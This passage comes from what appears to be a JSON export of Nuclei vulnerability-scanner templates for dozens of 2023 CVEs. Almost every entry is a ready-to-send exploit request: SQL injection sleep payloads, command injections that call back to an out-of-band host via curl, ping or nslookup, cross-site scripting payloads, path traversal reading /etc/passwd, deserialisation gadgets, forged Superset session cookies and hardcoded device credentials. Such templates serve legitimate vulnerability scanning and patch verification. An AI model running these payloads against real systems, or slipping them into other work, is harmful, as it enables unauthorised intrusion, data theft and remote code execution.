name=\"email\"\n\n{{email}}\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"password\"\n\n\n-----------------------------1037163726497\nContent-Disposition: form-data; name=\"cpass\"\n\n\n-----------------------------1037163726497--\n","GET /login.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_1 == 200","regex(\"^1$\", body_1)","!regex(\"^2$\", body_1)","len(body_1) == 1","contains(body_2, \"Faculty Evaluation\")"],"condition":"and"}]}]},{"id":"CVE-2023-34751","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=user&page=groups&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=User&backend=0&content=0&settings=0&permissions=0&tools=0&demo=0&gid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&name_old=User&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-28662","info":{"name":"Wordpress Gift Cards <= 4.3.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/gift-voucher/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Gift Vouchers and Packages"]}]},{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=wpgv_doajax_voucher_pdf_save_func&template=LTEgT1IgU0xFRVAoNik=\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, 'critical error')"],"condition":"and"}]}]},{"id":"CVE-2023-32117","info":{"name":"Integrate Google Drive <= 1.1.99 - Missing Authorization via REST API Endpoints","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-json/igd/v1/get-users-data"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"username\":","\"name\":","\"email\":","\"role\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-52251","info":{"name":"Kafka UI 0.7.1 Command Injection","severity":"high"},"requests":[{"raw":["GET /api/clusters HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"cluster-name","internal":true,"json":[".[0].name"]}]},{"raw":["GET /api/clusters/{{cluster-name}}/topics?page=1&perPage=25&showInternal=true HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"json","name":"topic-name","internal":true,"json":[".topics[].name"]}]},{"raw":["@timeout 20s\nGET /api/clusters/{{cluster-name}}/topics/{{topic-name}}/messages?q=new+ProcessBuilder%28%22curl%22%2C%22{{interactsh-url}}%22%29.start%28%29&filterQueryType=GROOVY_SCRIPT&attempt=7&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["Assigning partitions"]}]}]},{"id":"CVE-2023-47253","info":{"name":"Qualitor <= 8.20 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"Windows\",\"DNS\")","contains(content_type,\"text/javascript\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38035","info":{"name":"Ivanti Sentry - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /mics/services/MICSLogService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{{base64_decode('YwEAbQAYdXBsb2FkRmlsZVVzaW5nRmlsZUlucHV0TVMAB2NvbW1hbmRTAEw=')}}curl {{padding(oast,padstr,71)}}{{base64_decode('UwAGaXNSb290VHpOeg==')}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, 'isRunningTzz')","contains(interactsh_protocol, 'dns')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38433","info":{"name":"Fujitsu IP Series - Hardcoded Credentials","severity":"high"},"requests":[{"raw":["GET /b_download/index.html HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic {{base64(username + ':' + password)}}\n"],"attack":"pitchfork","payloads":{"username":["fedish264pro","fedish265pro"],"password":["h264pro@broadsight","h265pro@broadsight"]},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Field Support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1835","info":{"name":"Ninja Forms < 3.6.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=nf-processing&title=%253Csvg%252Fonload%253Dalert%2528document.domain%2529%253E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"Ninja Forms\")"],"condition":"and"}]}]},{"id":"CVE-2023-29506","info":{"name":"XWiki >= 13.10.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/authenticate/wiki/xwiki%22onload=%22alert(document.domain)%22/resetpassword"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wiki-xwiki\"onload=\"alert(document.domain)\"","resetPasswordForm"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6989","info":{"name":"Shield Security WP Plugin <= 18.5.9 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"dashboard_shield\"","\"shield_action\"","\"search_shield\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3380","info":{"name":"WAVLINK WN579X3 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","words":["images/WAVLINK-logo.png","Wi-Fi APP Login"],"condition":"and","internal":true}]},{"raw":["POST /cgi-bin/adm.cgi HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{RootURL}}/ping.shtml\n\npage=ping_test&CCMD=4&pingIp=255.255.255.255%3Bcurl+http%3A%2F%2F{{interactsh-url}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3578","info":{"name":"DedeCMS 5.7.109 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","part":"response","words":["DedeCms"],"case-insensitive":true}]},{"raw":["GET /co_do.php?rssurl=https://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns","http"]}]}]},{"id":"CVE-2023-5244","info":{"name":"Microweber < V.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/editor_tools/rte_image_editor?types=%27;});alert(document.domain);$(picker).on(%27Noodles%27,%20function(result)%20{%20var%20XSS=%27"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"alert(document.domain)\", \"microweber\")"],"condition":"and"}]}]},{"id":"CVE-2023-34105","info":{"name":"SRS - Command Injection","severity":"high"},"requests":[{"raw":["POST /api/v1/snapshots HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"action\": \"on_publish\", \"app\": \"`nslookup {{interactsh-url}}`\", \"stream\":\"foo\", \"vhost\": \"foo\", \"client_id\":\"foo\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["{\"code\":","data\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27524","info":{"name":"Apache Superset - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/v1/database/{{path}} HTTP/1.1\nHost: {{Hostname}}\nCookie: session={{session}}\n"],"payloads":{"path":["1","2","3","4","5","6","7","9","10"],"session":["eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFnng.XPeCvkBiP7rOv1PhgKZ8xkzi2jk","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKFu3g.k_WNoBY1ouhQyOXa5UcYdjVVuq0","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_fg.KalpJbMq1SZPCBuunG9-ycDX9HM","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKG_zQ.FPiBfT39gn2slf--XZHsk0rByEY","eyJfdXNlcl9pZCI6MSwidXNlcl9pZCI6MX0.ZKHAPQ.zRjwotMHJES3eW8fJH8F_5GlD-U"]},"attack":"clusterbomb","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"database_name\":","\"configuration_method\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37645","info":{"name":"EyouCms v1.6.3 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/data/model/custom_model_path/recruit.filelist.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["application/admin/","template/pc/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47115","info":{"name":"Label Studio - Cross-Site Scripting","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/signup/?&next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","POST /api/users/{{id}}/avatar/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF\n\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\nContent-Disposition: form-data; name=\"avatar\"; filename=\"nuclei.html\"\nContent-Type: image/png\n\n{{hex_decode(\"89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E\")}}\n------WebKitFormBoundarytZZRQ9D2LS0PMsHF\n","GET /api/current-user/whoami HTTP/1.1\nHost: {{Hostname}}\n","GET {{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"xpath","name":"csrftoken","internal":true,"attribute":"value","xpath":["/html/body/div/form/input"]},{"type":"json","part":"body","name":"id","internal":true,"json":[".id"]},{"type":"json","part":"body","name":"filename","internal":true,"json":[".avatar"]}],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, 'text/html')","contains(body, \"\")"],"condition":"and"}]}]},{"id":"CVE-2023-37270","info":{"name":"Piwigo 13.7.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: '\">{{7*7}}${2*2}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=user_activity HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["Warning: [mysql error","INSERT INTO","SQL syntax;"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-28432","info":{"name":"MinIO Cluster Deployment - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /minio/bootstrap/v1/verify HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"MINIO_ROOT_PASSWORD\":","\"MINIO_ROOT_USER\":","\"MinioEnv\":"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-4116","info":{"name":"PHPJabbers Taxi Booking 2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"Passengers\", \"Drop-off address\", \">\")"],"condition":"and"}]}]},{"id":"CVE-2023-2780","info":{"name":"Mlflow <2.3.1 - Local File Inclusion Bypass","severity":"critical"},"requests":[{"raw":["POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\"}\n","POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json; charset=utf-8\n\n{\"name\":\"{{randstr}}\",\"source\":\"file://./etc\"}\n","GET /model-versions/get-artifact?path=passwd&name={{randstr}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-5830","info":{"name":"ColumbiaSoft DocumentLocator - Improper Authentication","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /api/authentication/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\n\n{\n \"LoginType\":\"differentWindows\",\n \"User\":\"{{randstr}}\",\n \"Password\":\"{{rand_base(5, \"abc\")}}\",\n \"Domain\":\"{{randstr}}\",\n \"Server\":\"{{interactsh-url}}\",\n \"Repository\":\"{{randstr}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"Authorized\":false"]}]}]},{"id":"CVE-2023-4521","info":{"name":"Import XML and RSS Feeds < 2.1.5 - Unauthenticated RCE","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Import XML and RSS Feeds"]}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-xml-feed/uploads/169227090864de013cac47b.php?cmd=ping+{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-34753","info":{"name":"bloofoxCMS v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=tmpl&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=default&template=default.html&css=default.css&template_print=print.html&template_print_css=print.css&template_login=login.html&template_text=text.html&be=0&tid='+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","contains(header_2, \"text/html\")","contains(body_2, 'bloofoxCMS Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-0297","info":{"name":"PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)","severity":"critical"},"requests":[{"raw":["GET /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\n","POST /flash/addcrypted2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\njk=pyimport+os%3Bos.system%28%22{{cmd}}%22%29%3Bf%3Dfunction+f2%28%29%7B%7D%3B&packages=YyVIbzmZ&crypted=ZbIlxWYe&passwords=oJFFUtTw\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["JDownloader"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2023-41642","info":{"name":"RealGimm by GruppoSCAI v1.1.37p38 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: \n\n__EVENTTARGET=T1bPulsantiera&EVENTARGUMENT=TlbPulsantiera_Item_0%3AUP&___VIEWSTATE='TESTING&LeftArea%3ALeftMenu_hidden=&T1bPulsantiera_CancelClick=false&TlbPulsantiera_hidden=&cbUtente=&txtDataRichiestaDa=&txtDataRichiestaA=&TopArea%3ATopMenu=\n","GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: \n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["","Invalid_Viewstate"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]}]}]},{"id":"CVE-2023-2252","info":{"name":"Directorist < 7.5.4 - Local File Inclusion","severity":"low"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=at_biz_dir&page=tools&step=2&file=%2Fetc%2Fpasswd&delimiter=%3B HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-33405","info":{"name":"BlogEngine CMS - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/default.aspx?years=http://oast.pro"],"matchers":[{"type":"regex","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.pro.*$"],"part":"header"}]}]},{"id":"CVE-2023-25346","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","GET /v2/person/not-found?id=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-2059","info":{"name":"DedeCMS 5.7.87 - Directory Traversal","severity":"medium"},"requests":[{"raw":["GET /include/dialog/select_templets.php?f=form1.templetactivepath=%2ftemplets/../..\\..\\..\\ HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["dirname(__FILE__)","$cfg_basedir","dedecms"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39109","info":{"name":"rConfig 3.9.4 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /lib/crud/userprocess.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&pass={{password}}&sublogin=1\n","GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["rConfig"]},{"type":"regex","part":"body_3","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-49070","info":{"name":"Apache OFBiz < 18.12.10 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n \n {{randstr}}\n \n \n \n \n \n test\n \n {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")}}\n \n \n \n \n \n \n\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["faultString"]}]}]},{"id":"CVE-2023-39026","info":{"name":"FileMage Gateway - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini"],"matchers":[{"type":"dsl","dsl":["contains_all(body,'bit app support','extensions','fonts')","contains(content_type, 'text/plain')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-2779","info":{"name":"Super Socializer < 7.13.52 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://oast.pro HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"\") && contains(body_2, \"facebook_urls\")"],"condition":"and"}]}]},{"id":"CVE-2023-33629","info":{"name":"H3C Magic R300-2100M - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /goform/aspForm HTTP/1.1\nHost: {{Hostname}}\n\nCMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/{{filename}});\n","GET /{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302","contains(body_1, 'do_cmd.asp')","status_code_2 == 200","contains_all(body_2, 'www', 'www_multi')"],"condition":"and"}]}]},{"id":"CVE-2023-5003","info":{"name":"Active Directory Integration WP Plugin < 4.1.10 - Log Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/ldap-authentication-report.csv"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID","USERNAME","TIME","LDAP STATUS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3077","info":{"name":"MStore API < 3.9.8 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"MStore API\")"],"condition":"and"}]},{"raw":["@timeout: 15s\nGET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-6786","info":{"name":"Payment Gateway for Telcell < 2.0.4 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-2948","info":{"name":"OpenEMR < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"list_id: 1}});}}alert(document.domain);\", \"select at least one Provider\", \"Save\")"],"condition":"and"}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-45136","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"\", \"data-xwiki-reference\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43795","info":{"name":"GeoServer WPS - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n\n\n JTS:area\n \n \n geom\n \n \n \n \n \n \n \n result\n \n \n\n"],"payloads":{"path":["/wms","/geoserver/wms"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-37979","info":{"name":"Ninja Forms < 3.6.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"\") && contains(body_2, \"import_form_template\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR 